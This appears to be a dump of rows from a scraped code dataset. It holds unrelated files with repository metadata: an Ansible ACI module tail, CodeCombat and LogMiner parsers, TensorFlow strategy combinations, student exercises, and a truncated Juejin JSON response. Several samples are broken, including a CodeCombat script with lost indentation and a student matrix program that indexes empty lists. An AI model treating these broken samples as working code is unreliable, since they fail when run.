            aci_rn=domain_rn,
            module_object=domain_mo,
            target_filter={'name': domain},
        ),
        child_classes=['infraRsVlanNs'],
    )
    aci.get_existing()
    if state == 'present':
        # The binding itself lives in the infraRsVlanNs child pointing at the
        # VLAN pool's DN.
        aci.payload(
            aci_class=domain_class,
            class_config=dict(name=domain),
            child_configs=[
                {'infraRsVlanNs': {'attributes': {'tDn': aci_mo}}},
            ]
        )
        aci.get_diff(aci_class=domain_class)
        aci.post_config()
    elif state == 'absent':
        aci.delete_config()
    # Emits the module result (current/previous/proposed/... keys) and exits.
    aci.exit_json()
if __name__ == "__main__":
    main()
| [
"[email protected]"
] | |
ffa90cad695dc1a89745ab2dd5a57a1006b45f38 | 3716e91c0a18a2cf0b5807cc673d95a7539b008c | /Forest/BackwoodsFork.py | f295233eb6d3ecd0680e498a956ebd483a4ff8fb | [] | no_license | kiwiapple87/CodeCombat-1 | 47f0fa6d75d6d3e9fb9c28feeb6fe2648664c1aa | ce0201e5ed099193ca40afd3b7abeee5a3732387 | refs/heads/master | 2021-05-01T16:38:03.575842 | 2016-08-25T11:13:26 | 2016-08-25T11:13:26 | 66,552,813 | 1 | 0 | null | 2016-08-25T11:39:20 | 2016-08-25T11:39:18 | null | UTF-8 | Python | false | false | 818 | py | # https://codecombat.com/play/level/backwoods-fork
# Incoming ogres!
# Use the checkAndAttack function to make your code easy to read.
# This function has a parameter.
# An parameter is a way of passing information into a function.
def checkAndAttack(target):
# The 'target' parameter is just a variable!
# It contains the argument when the function was called.
if target:
hero.attack(target)
hero.moveXY(43, 34)
while True:
hero.moveXY(58, 52)
topEnemy = hero.findNearestEnemy()
checkAndAttack(topEnemy)
hero.moveXY(58, 16)
topEnemy = hero.findNearestEnemy()
checkAndAttack(topEnemy)
# Move to the bottom X mark.
# Create a variable named bottomEnemy and find the nearest enemy.
# Use the checkAndAttack function, and include the bottomEnemy variable.
| [
"[email protected]"
] | |
e1dc4656c4add693f2dbb8e3c9a87990852101c8 | dccdb71dd75560ffeb076cedbd78b36e33b3adf2 | /EstruturaSequencial/ex02_numero.py | 5a2f85ce99f95f27163e7a478296cece3c9b0762 | [] | no_license | IngridFCosta/exerciciosPythonBrasil | 6fa669896cae135142101c522be7a919bda583b7 | 5c84d70f720b45a260320b08a5103bad5ce78339 | refs/heads/master | 2023-04-22T02:34:40.206350 | 2021-05-06T17:14:50 | 2021-05-06T17:14:50 | 291,265,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | """2-Faça um Programa que peça um número e então mostre a mensagem O número informado foi [número]."""
numero=int(input('Escreva um número: '))
print(f'O número informado foi {numero}') | [
"[email protected]"
] | |
a4d90d95aa7d47485090ac92009ccbef391cdfec | 5dfb9ca5e0c8cb4cb7a7a92d6f6a34b34a841869 | /LeetCodeSolutions/python/513_Find_Bottom_Left_Tree_Value.py | 808427669e6aa627ab9f1b0b0ec2c32986e01b6e | [
"MIT"
] | permissive | ChuanleiGuo/AlgorithmsPlayground | 2f71d29e697a656562e3d2a2de783d964dc6a325 | 90b6287b742c8bfd3797540c408d679be2821a40 | refs/heads/master | 2021-01-11T18:30:43.218959 | 2018-11-19T02:20:31 | 2018-11-19T02:20:31 | 79,550,052 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | # Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def findBottomLeftValue(self, root):
"""
:type root: TreeNode
:rtype: int
"""
queue = [root]
for node in queue:
queue += filter(None, [node.right, node.left])
return node.val
| [
"[email protected]"
] | |
77ff1c2b53c17c875b84bb4f6b5a2944e786527e | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_207/ch136_2020_04_01_11_57_23_991207.py | d8760caf5639fb9f950467abccac43d652a78617 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,282 | py | import random
dinheiros = 10
d1 = random.randint(1,6)
d2 = random.randint(1,6)
d3 = random.randint(1,6)
soma = d1+d2+d3
print (soma)
JOGO = False
#fase de DICAS
print ("DICAS: \n Você possui {0} dinheiros." .format(dinheiros))
if dinheiros <=0:
print ("Você perdeu!")
pergunta1 = input("Você quer uma dica? ")
if pergunta1 == 'sim':
dinheiros -= 1
perguntaA = int(input ("Me diga um valor possível para a soma "))
perguntaB = int(input ("Me diga outro valor possível para a soma "))
perguntaC = int(input ("Me diga outro valor possível para a soma "))
if perguntaA == soma:
print ("Está entre os 3")
elif perguntaB == soma:
print ("Está entre os 3")
elif perguntaC == soma:
print ("Está entre os 3")
else:
print ("Não está entre os 3")
JOGO = True
while JOGO:
if dinheiros <=0:
print ("Você perdeu!")
JOGO = False
else:
print(" {0} dinheiros disponível" .format(dinheiros))
resposta = int(input ("Qual o valor da soma?"))
if resposta == soma:
dinheiros += 5*dinheiros
print ("Você ganhou o jogo com {0} dinheiros" .format (dinheiros))
JOGO = False
else:
dinheiros -= 1
| [
"[email protected]"
] | |
e3feca8063a41c8988af243eef5ea642b26fe9c5 | 4a74875c7366a19b7189fcb89fa0fa27abc4309e | /data_pipeline/processor/oracle_where_parser.py | 60562db03590c59c92acd5b85aa9bc775183f86c | [
"Apache-2.0"
] | permissive | saubury-iag/data_pipeline | d865d66d25eeb4ea6c6a655ae934bfe83c0efa06 | 4ad04198ed48c643045113c6e2c3e0848adbdec6 | refs/heads/master | 2021-07-23T08:43:46.754162 | 2017-11-01T05:05:23 | 2017-11-01T05:05:23 | 108,808,749 | 0 | 0 | null | 2017-10-30T06:06:41 | 2017-10-30T06:06:41 | null | UTF-8 | Python | false | false | 5,101 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
###############################################################################
# Module: oracle_where_parser
# Purpose: Parses Where component of LogMiner SQL statements
#
# Notes:
#
###############################################################################
from enum import Enum
import data_pipeline.constants.const as const
from .oracle_base_parser import OracleBaseParser
WhereState = Enum('WhereState', 'start key operator value')
class OracleWhereParser(OracleBaseParser):
def __init__(self):
super(OracleWhereParser, self).__init__()
self._primarykey_list = None
self._curr_key = None
self._statement = None
def _set_primary_keys_from_string(self, pkstr, table_name):
pkstr = pkstr.strip()
if pkstr:
if pkstr == const.NO_KEYFIELD_STR:
self._primarykey_list = []
else:
self._primarykey_list = [pk.strip().upper()
for pk in pkstr.split(const.COMMA)]
self._logger.debug(
"[{table}] Set primary keys = {pks}"
.format(table=table_name, pks=self._primarykey_list))
return self._primarykey_list
def set_primary_keys(self, value):
self._primarykey_list = value
def set_statement(self, value):
self._statement = value
def parse(self):
self._char_buff = const.EMPTY_STRING
self._parsing_state = WhereState.start
while self._read_cursor < len(self._commit_statement):
if self._can_consume_char():
self._consume()
self._transition_where_parsing_state()
self._next()
def _can_consume_char(self):
return (self._parsing_state == WhereState.key or
self._parsing_state == WhereState.value)
def _transition_where_parsing_state(self):
if self._parsing_state == WhereState.start:
self._transition_from_where_start_parsing()
elif self._parsing_state == WhereState.key:
self._transition_from_where_key_parsing()
elif self._parsing_state == WhereState.operator:
self._transition_from_where_operator_parsing()
elif self._parsing_state == WhereState.value:
self._transition_from_where_value_parsing()
def _transition_from_where_start_parsing(self):
if self._at_key_word_boundary():
self._empty_buffer()
self._parsing_state = WhereState.key
def _transition_from_where_key_parsing(self):
if self._at_key_word_boundary():
self._curr_key = self._flush_buffer()
self._parsing_state = WhereState.operator
def _transition_from_where_operator_parsing(self):
is_null_index = self._commit_statement.find(const.IS_NULL,
self._read_cursor)
if self._read_cursor == is_null_index:
# Prefer using None over const.IS_NULL in case a
# key's value is actually 'IS NULL'
self._statement.add_condition(self._curr_key, None)
self._read_cursor += len(const.IS_NULL)
self._empty_buffer()
self._parsing_state = WhereState.start
elif self._at_value_word_boundary():
self._empty_buffer()
self._parsing_state = WhereState.value
def _transition_from_where_value_parsing(self):
if self._at_escaped_single_quote():
self._next()
elif self._at_value_word_boundary():
where_value = self._flush_buffer()
self._statement.add_condition(self._curr_key, where_value)
self._parsing_state = WhereState.start
def _can_add_primary_key(self):
return (self._primarykey_list is None or
const.NO_KEYFIELD_STR in self._primarykey_list or
self._curr_key.upper() in self._primarykey_list)
def _at_key_word_boundary(self):
return self._curr_char == const.DOUBLE_QUOTE
def _at_value_word_boundary(self):
return self._curr_char == const.SINGLE_QUOTE
def _flush_buffer(self):
# Always remove last char which is only useful when
# there are escaped single-quotes
return super(OracleWhereParser, self)._flush_buffer()[:-1]
| [
"[email protected]"
] | |
b15f2abae8cd733f498374b1a2d0c477cd073e9a | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/482/usersdata/309/110136/submittedfiles/Av2_Parte4.py | 4caf25849b6aea491973c78fc097c44d88370f19 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 320 | py | # -*- coding: utf-8 -*-
mt=[]
lin=int(input("Digite a quantidade de linhas da matriz:"))
colu=int(input("Digite a quantidade de colunas da matriz:"))
for i in range (lin,0,-1):
lista=[]
for j in range (colu,0,-1):
lista[j]=(int(input("Digite um elemento para sua matriz:")))
mt[i]=lista
print(mt)
| [
"[email protected]"
] | |
3a3a2bda3c9dc71fb5f213b93e4215892c92b19a | 354e2dede869a32e57c66c2e1b71bbd61d2cc36d | /widgets/pad.py | 17d2e11a21f2a29919b0d0f7268c7bfef1cc107d | [
"MIT"
] | permissive | hiddenvs/micropython_ra8875 | 5abf906d95c0c997ceb9638b8785c4cc2f803cf6 | a61314d62d6add831f6618c857b01d1a5b7ce388 | refs/heads/master | 2023-04-09T22:37:23.097440 | 2021-04-16T13:13:34 | 2021-04-16T13:13:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,750 | py | # pad.py Extension to lcd160gui providing the invisible touchpad class
# Released under the MIT License (MIT). See LICENSE.
# Copyright (c) 2020 Peter Hinch
# Usage: import classes as required:
# from gui.widgets.pad import Pad
import uasyncio as asyncio
from micropython_ra8875.py.ugui import Touchable
from micropython_ra8875.primitives.delay_ms import Delay_ms
# Pad coordinates relate to bounding box (BB). x, y are of BB top left corner.
# likewise width and height refer to BB
class Pad(Touchable):
long_press_time = 1000
def __init__(self, location, *, height=20, width=50, onrelease=True,
callback=None, args=[], lp_callback=None, lp_args=[]):
super().__init__(location, None, height, width, None, None, None, None, False, '', None)
self.callback = (lambda *_: None) if callback is None else callback
self.callback_args = args
self.onrelease = onrelease
self.lp_callback = lp_callback
self.lp_args = lp_args
self.lp_task = None # Long press not in progress
def show(self):
pass
def _touched(self, x, y): # Process touch
if self.lp_callback is not None:
self.lp_task = asyncio.create_task(self.longpress())
if not self.onrelease:
self.callback(self, *self.callback_args) # Callback not a bound method so pass self
def _untouched(self):
if self.lp_task is not None:
self.lp_task.cancel()
self.lp_task = None
if self.onrelease:
self.callback(self, *self.callback_args) # Callback not a bound method so pass self
async def longpress(self):
await asyncio.sleep_ms(Pad.long_press_time)
self.lp_callback(self, *self.lp_args)
| [
"[email protected]"
] | |
b938e7c532cfe60e760b8a0b87abee91e54e4942 | 549f6aeee12b66189d6e30b448a656fe55bc3eca | /tensorflow/python/distribute/strategy_combinations.py | d66c7acba7776ce0478f7d6e7076a2bf5ddace66 | [
"Apache-2.0"
] | permissive | thomkallor/tensorflow | 2f6973b95a3fbaa41b6a4d03edb7ae665398865b | fb03bc60fe90d332e357aafa8359a44369ff8caf | refs/heads/master | 2022-11-10T20:25:03.224037 | 2020-06-26T23:39:44 | 2020-06-26T23:49:42 | 275,148,424 | 0 | 0 | Apache-2.0 | 2020-06-26T12:15:14 | 2020-06-26T12:15:13 | null | UTF-8 | Python | false | false | 16,830 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Strategy and optimizer combinations for combinations.combine()."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
from tensorflow.python import tf2
from tensorflow.python.distribute import central_storage_strategy
from tensorflow.python.distribute import cluster_resolver
from tensorflow.python.distribute import collective_all_reduce_strategy
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.distribute import mirrored_strategy as mirrored_lib
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import one_device_strategy as one_device_lib
from tensorflow.python.distribute import tpu_strategy as tpu_lib
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.eager import context
from tensorflow.python.eager import remote
from tensorflow.python.framework import config
from tensorflow.python.keras.optimizer_v2 import adadelta as adadelta_keras_v2
from tensorflow.python.keras.optimizer_v2 import adagrad as adagrad_keras_v2
from tensorflow.python.keras.optimizer_v2 import adam as adam_keras_v2
from tensorflow.python.keras.optimizer_v2 import adamax as adamax_keras_v2
from tensorflow.python.keras.optimizer_v2 import ftrl as ftrl_keras_v2
from tensorflow.python.keras.optimizer_v2 import gradient_descent as gradient_descent_keras_v2
from tensorflow.python.keras.optimizer_v2 import nadam as nadam_keras_v2
from tensorflow.python.keras.optimizer_v2 import rmsprop as rmsprop_keras_v2
from tensorflow.python.platform import flags
from tensorflow.python.tpu import device_assignment as device_assignment_lib
from tensorflow.python.tpu import tpu_strategy_util
from tensorflow.python.training import adagrad
from tensorflow.python.training import adam
from tensorflow.python.training import ftrl
from tensorflow.python.training import gradient_descent
from tensorflow.python.training import rmsprop
FLAGS = flags.FLAGS
_did_connect_to_cluster = False
# pylint: disable=missing-docstring
def _get_tpu_strategy_creator(steps_per_run,
use_single_core=False,
enable_packed_variable=False,
**kwargs):
def _create_tpu_strategy():
global _did_connect_to_cluster
try:
# Attempt to locally discover the TPU. This will fail for Cloud TPU, in
# which case we fall back to the values passed as flags.
resolver = tpu_cluster_resolver.TPUClusterResolver()
did_automatically_resolve = True
except ValueError:
did_automatically_resolve = False
# These flags will be defined by tpu_test_wrapper.py.
resolver = tpu_cluster_resolver.TPUClusterResolver(
tpu=hasattr(FLAGS, "tpu") and FLAGS.tpu or "",
zone=hasattr(FLAGS, "zone") and FLAGS.zone or None,
project=hasattr(FLAGS, "project") and FLAGS.project or None,
)
# Only connect once per process, rather than per test method.
if getattr(FLAGS, "tpu", "") or did_automatically_resolve:
if not _did_connect_to_cluster:
remote.connect_to_cluster(resolver)
_did_connect_to_cluster = True
topology = tpu_strategy_util.initialize_tpu_system(resolver)
device_assignment = None
if use_single_core:
device_assignment = device_assignment_lib.DeviceAssignment(
topology, core_assignment=device_assignment_lib.
SINGLE_CORE_ASSIGNMENT)
# Steps per run is only supported in TF 1.x
if tf2.enabled():
strategy = tpu_lib.TPUStrategy(resolver, device_assignment, **kwargs)
else:
strategy = tpu_lib.TPUStrategyV1(resolver, steps_per_run,
device_assignment, **kwargs)
strategy._enable_packed_variable_in_eager_mode = enable_packed_variable # pylint: disable=protected-access
return strategy
return _create_tpu_strategy
def _get_multi_worker_mirrored_creator(required_gpus):
def _create_multi_worker_mirrored():
tf_config = cluster_resolver.TFConfigClusterResolver()
resolver = cluster_resolver.SimpleClusterResolver(
cluster_spec=tf_config.cluster_spec(),
task_type=tf_config.task_type,
task_id=tf_config.task_id,
master=tf_config.master(),
environment=tf_config.environment,
num_accelerators={"GPU": required_gpus},
rpc_layer=tf_config.rpc_layer or "grpc",
)
# Always create the strategy in eager mode so that it starts the server and
# configures the eager context. The eager context can no longer be
# configured after initialization.
with context.eager_mode():
strategy = collective_all_reduce_strategy.CollectiveAllReduceStrategy(
cluster_resolver=resolver)
# TODO(b/152320929): Wait for the cluster before proceeding, otherwise
# collectives may hang if any worker launches collectives before the chief
# creates the strategy.
try:
multi_process_runner.barrier().wait()
except ValueError:
# If the creator is called in the main process,
# multi_process_runner.barrier() raises ValueError, which is safe to
# ignore.
pass
return strategy
return _create_multi_worker_mirrored
# pylint: disable=g-long-lambda
default_strategy = combinations.NamedDistribution(
"Default",
distribution_strategy_context._get_default_strategy, # pylint: disable=protected-access
required_gpus=None)
one_device_strategy = combinations.NamedDistribution(
"OneDeviceCPU",
lambda: one_device_lib.OneDeviceStrategy("/cpu:0"),
required_gpus=None)
one_device_strategy_gpu = combinations.NamedDistribution(
"OneDeviceGPU",
lambda: one_device_lib.OneDeviceStrategy("/gpu:0"),
required_gpus=1)
one_device_strategy_on_worker_1 = combinations.NamedDistribution(
"OneDeviceOnWorker1CPU",
lambda: one_device_lib.OneDeviceStrategy("/job:worker/replica:0/task:1/cpu:0"), # pylint: disable=line-too-long
required_gpus=None)
one_device_strategy_gpu_on_worker_1 = combinations.NamedDistribution(
"OneDeviceOnWorker1GPU",
lambda: one_device_lib.OneDeviceStrategy("/job:worker/replica:0/task:1/gpu:0"), # pylint: disable=line-too-long
required_gpus=1)
tpu_strategy = combinations.NamedDistribution(
"TPU", _get_tpu_strategy_creator(steps_per_run=2), required_tpu=True)
tpu_strategy_packed_var = combinations.NamedDistribution(
"TPUPackedVar",
_get_tpu_strategy_creator(steps_per_run=2, enable_packed_variable=True),
required_tpu=True)
tpu_strategy_one_step = combinations.NamedDistribution(
"TPUOneStep", _get_tpu_strategy_creator(steps_per_run=1), required_tpu=True)
tpu_strategy_one_core = combinations.NamedDistribution(
"TPUOneCore",
_get_tpu_strategy_creator(steps_per_run=2, use_single_core=True),
required_tpu=True)
tpu_strategy_one_step_one_core = combinations.NamedDistribution(
"TPUOneStepOneCore",
_get_tpu_strategy_creator(steps_per_run=1, use_single_core=True),
required_tpu=True)
cloud_tpu_strategy = combinations.NamedDistribution(
"CloudTPU",
_get_tpu_strategy_creator(steps_per_run=2),
required_tpu=True,
use_cloud_tpu=True)
mirrored_strategy_with_one_cpu = combinations.NamedDistribution(
"Mirrored1CPU", lambda: mirrored_lib.MirroredStrategy(["/cpu:0"]))
mirrored_strategy_with_one_gpu = combinations.NamedDistribution(
"Mirrored1GPU",
lambda: mirrored_lib.MirroredStrategy(["/gpu:0"]),
required_gpus=1)
mirrored_strategy_with_gpu_and_cpu = combinations.NamedDistribution(
"MirroredCPUAndGPU",
lambda: mirrored_lib.MirroredStrategy(["/gpu:0", "/cpu:0"]),
required_gpus=1)
mirrored_strategy_with_two_gpus = combinations.NamedDistribution(
"Mirrored2GPUs",
lambda: mirrored_lib.MirroredStrategy(["/gpu:0", "/gpu:1"]),
required_gpus=2)
# Should call set_virtual_cpus_to_at_least(3) in your test's setUp methods.
mirrored_strategy_with_cpu_1_and_2 = combinations.NamedDistribution(
"Mirrored2CPU", lambda: mirrored_lib.MirroredStrategy(["/cpu:1", "/cpu:2"]))
central_storage_strategy_with_two_gpus = combinations.NamedDistribution(
"CentralStorage2GPUs",
lambda: central_storage_strategy.CentralStorageStrategy._from_num_gpus(2), # pylint: disable=protected-access
required_gpus=2)
central_storage_strategy_with_gpu_and_cpu = combinations.NamedDistribution(
"CentralStorageCPUAndGPU",
lambda: central_storage_strategy.CentralStorageStrategy(
["/gpu:0", "/cpu:0"]),
required_gpus=1)
# chief + 1 worker, with CPU.
multi_worker_mirrored_2x1_cpu = combinations.NamedDistribution(
"MultiWorkerMirrored2x1CPU",
_get_multi_worker_mirrored_creator(required_gpus=0),
has_chief=True,
num_workers=1,
)
# chief + 1 worker, with 1 GPU each.
multi_worker_mirrored_2x1_gpu = combinations.NamedDistribution(
"MultiWorkerMirrored2x1GPU",
_get_multi_worker_mirrored_creator(required_gpus=1),
has_chief=True,
num_workers=1,
required_gpus=1,
)
# chief + 1 worker, with 2 GPU each.
multi_worker_mirrored_2x2_gpu = combinations.NamedDistribution(
"MultiWorkerMirrored2x2GPU",
_get_multi_worker_mirrored_creator(required_gpus=2),
has_chief=True,
num_workers=1,
required_gpus=2,
)
# chief + 3 workers, with CPU.
multi_worker_mirrored_4x1_cpu = combinations.NamedDistribution(
"MultiWorkerMirrored4x1CPU",
_get_multi_worker_mirrored_creator(required_gpus=0),
has_chief=True,
num_workers=3,
)
# Shutdown the runners gracefully to avoid the processes getting SIGTERM.
def _shutdown_at_exit():
for strategy in [
multi_worker_mirrored_2x1_cpu,
multi_worker_mirrored_2x1_gpu,
multi_worker_mirrored_2x2_gpu,
multi_worker_mirrored_4x1_cpu,
]:
if strategy.runner:
strategy.runner.shutdown()
atexit.register(_shutdown_at_exit)
gradient_descent_optimizer_v1_fn = combinations.NamedObject(
"GradientDescentV1",
lambda: gradient_descent.GradientDescentOptimizer(0.001))
adagrad_optimizer_v1_fn = combinations.NamedObject(
"AdagradV1", lambda: adagrad.AdagradOptimizer(0.001))
adam_optimizer_v1_fn = combinations.NamedObject(
"AdamV1", lambda: adam.AdamOptimizer(0.001, epsilon=1))
ftrl_optimizer_v1_fn = combinations.NamedObject(
"FtrlV1", lambda: ftrl.FtrlOptimizer(0.001))
rmsprop_optimizer_v1_fn = combinations.NamedObject(
"RmsPropV1", lambda: rmsprop.RMSPropOptimizer(0.001))
# TODO(shiningsun): consider adding the other v1 optimizers
optimizers_v1 = [
gradient_descent_optimizer_v1_fn, adagrad_optimizer_v1_fn,
ftrl_optimizer_v1_fn, rmsprop_optimizer_v1_fn
]
adadelta_optimizer_keras_v2_fn = combinations.NamedObject(
"AdadeltaKerasV2", lambda: adadelta_keras_v2.Adadelta(0.001))
adagrad_optimizer_keras_v2_fn = combinations.NamedObject(
"AdagradKerasV2", lambda: adagrad_keras_v2.Adagrad(0.001))
adam_optimizer_keras_v2_fn = combinations.NamedObject(
"AdamKerasV2", lambda: adam_keras_v2.Adam(0.001, epsilon=1.0))
adamax_optimizer_keras_v2_fn = combinations.NamedObject(
"AdamaxKerasV2", lambda: adamax_keras_v2.Adamax(0.001, epsilon=1.0))
nadam_optimizer_keras_v2_fn = combinations.NamedObject(
"NadamKerasV2", lambda: nadam_keras_v2.Nadam(0.001, epsilon=1.0))
ftrl_optimizer_keras_v2_fn = combinations.NamedObject(
"FtrlKerasV2", lambda: ftrl_keras_v2.Ftrl(0.001))
gradient_descent_optimizer_keras_v2_fn = combinations.NamedObject(
"GradientDescentKerasV2", lambda: gradient_descent_keras_v2.SGD(0.001))
rmsprop_optimizer_keras_v2_fn = combinations.NamedObject(
"RmsPropKerasV2", lambda: rmsprop_keras_v2.RMSprop(0.001))
# TODO(shiningsun): consider adding the other v2 optimizers
optimizers_v2 = [
gradient_descent_optimizer_keras_v2_fn, adagrad_optimizer_keras_v2_fn
]
optimizers_v1_and_v2 = optimizers_v1 + optimizers_v2
graph_and_eager_modes = ["graph", "eager"]
# This function should be called in a test's `setUp` method with the
# maximum value needed in any test.
def set_virtual_cpus_to_at_least(num_virtual_cpus):
"""Create virtual CPU devices if they haven't yet been created."""
if num_virtual_cpus < 1:
raise ValueError("`num_virtual_cpus` must be at least 1 not %r" %
(num_virtual_cpus,))
physical_devices = config.list_physical_devices("CPU")
if not physical_devices:
raise RuntimeError("No CPUs found")
configs = config.get_logical_device_configuration(physical_devices[0])
if configs is None:
logical_devices = [
context.LogicalDeviceConfiguration() for _ in range(num_virtual_cpus)
]
config.set_logical_device_configuration(physical_devices[0],
logical_devices)
else:
if len(configs) < num_virtual_cpus:
raise RuntimeError("Already configured with %d < %d virtual CPUs" %
(len(configs), num_virtual_cpus))
def distributions_and_v1_optimizers():
"""A common set of combination with DistributionStrategies and Optimizers."""
return combinations.combine(
distribution=[
one_device_strategy,
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
],
optimizer_fn=optimizers_v1)
def distributions_and_v2_optimizers():
"""A common set of combination with DistributionStrategies and Optimizers."""
return combinations.combine(
distribution=[
one_device_strategy,
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
],
optimizer_fn=optimizers_v2)
def distributions_and_v1_and_v2_optimizers():
"""A common set of combination with DistributionStrategies and Optimizers."""
return combinations.combine(
distribution=[
one_device_strategy,
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
],
optimizer_fn=optimizers_v1_and_v2)
strategies_minus_tpu = [
default_strategy,
one_device_strategy,
one_device_strategy_gpu,
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
central_storage_strategy_with_gpu_and_cpu,
]
strategies_minus_default_and_tpu = [
one_device_strategy,
one_device_strategy_gpu,
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
]
tpu_strategies = [
tpu_strategy, # steps_per_run=2
tpu_strategy_one_step,
tpu_strategy_packed_var,
cloud_tpu_strategy,
]
all_strategies_minus_default = strategies_minus_default_and_tpu + tpu_strategies
all_strategies = strategies_minus_tpu + tpu_strategies
two_replica_strategies = [
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
multi_worker_mirrored_2x1_cpu,
multi_worker_mirrored_2x1_gpu,
tpu_strategy, # steps_per_run=2
tpu_strategy_one_step,
central_storage_strategy_with_gpu_and_cpu,
]
four_replica_strategies = [
multi_worker_mirrored_2x2_gpu,
multi_worker_mirrored_4x1_cpu,
]
# TODO(b/159831907): replace with two_replica_strategies after the tests using
# it work with MWMS.
multidevice_strategies = [
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
tpu_strategy, # steps_per_run=2
tpu_strategy_one_step
]
def strategy_minus_tpu_combinations():
return combinations.combine(
distribution=strategies_minus_tpu, mode=["graph", "eager"])
def tpu_strategy_combinations():
return combinations.combine(distribution=tpu_strategies, mode=["graph"])
def all_strategy_combinations():
return strategy_minus_tpu_combinations() + tpu_strategy_combinations()
def all_strategy_minus_default_and_tpu_combinations():
return combinations.combine(
distribution=[
one_device_strategy, one_device_strategy_gpu,
mirrored_strategy_with_gpu_and_cpu, mirrored_strategy_with_two_gpus
],
mode=["graph", "eager"])
def all_strategy_combinations_minus_default():
return (all_strategy_minus_default_and_tpu_combinations() +
tpu_strategy_combinations())
| [
"[email protected]"
] | |
0c9daec6558d9de88338199192f4e5d1dad32639 | 8dca64dd11b23a7d59413ac8e28e92a0ab80c49c | /832. Flipping an Image/solution.py | 25b69e5fc050245a58bc16a757d3ea451316a7c4 | [] | no_license | huangruihaocst/leetcode-python | f854498c0a1d257698e10889531c526299d47e39 | 8f88cae7cc982ab8495e185914b1baeceb294060 | refs/heads/master | 2020-03-21T20:52:17.668477 | 2018-10-08T20:29:35 | 2018-10-08T20:29:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | class Solution:
def flipAndInvertImage(self, A):
"""
:type A: List[List[int]]
:rtype: List[List[int]]
"""
return self.invert(self.reverse(A))
@staticmethod
def reverse(A):
"""
:type A: List[List[int]]
:rtype: List[List[int]]
"""
return list(map(lambda l: list(reversed(l)), A))
@staticmethod
def invert(A):
"""
:type A: List[List[int]]
:rtype: List[List[int]]
"""
return list(map(lambda l: list(map(lambda i: 1 - i, l)), A))
if __name__ == '__main__':
s = Solution()
print(s.flipAndInvertImage([[1,1,0,0],[1,0,0,1],[0,1,1,1],[1,0,1,0]]))
| [
"[email protected]"
] | |
d95fb552556fe37b61378dbfef21dcd4b15356dd | 3d7039903da398ae128e43c7d8c9662fda77fbdf | /database/Vue.js/juejin_2910.py | 433d99a184537f0048d01e9b65145675a9d3cc65 | [] | no_license | ChenYongChang1/spider_study | a9aa22e6ed986193bf546bb567712876c7be5e15 | fe5fbc1a5562ff19c70351303997d3df3af690db | refs/heads/master | 2023-08-05T10:43:11.019178 | 2021-09-18T01:30:22 | 2021-09-18T01:30:22 | 406,727,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66,851 | py | {"err_no": 0, "err_msg": "success", "data": [{"article_id": "6919726191666528263", "article_info": {"article_id": "6919726191666528263", "user_id": "2400989127905352", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "vue 中使用柱状图 并自修改配置", "brief_content": "1.在html文件导入echart2.在main.js上挂载echarts对象3.页面结构4.data中的数据mounted钩子函数调用更改柱形图配置1.在index.html引入主题配置文件2.在需", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1611124318", "mtime": "1611139838", "rtime": "1611128360", "draft_id": "6919725601553121287", "view_count": 153, "collect_count": 0, "digg_count": 3, "comment_count": 0, "hot_index": 10, "is_hot": 0, "rank_index": 0.0001309, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2400989127905352", "user_name": "小江和他自己", "company": "", "job_title": "前端", "avatar_large": 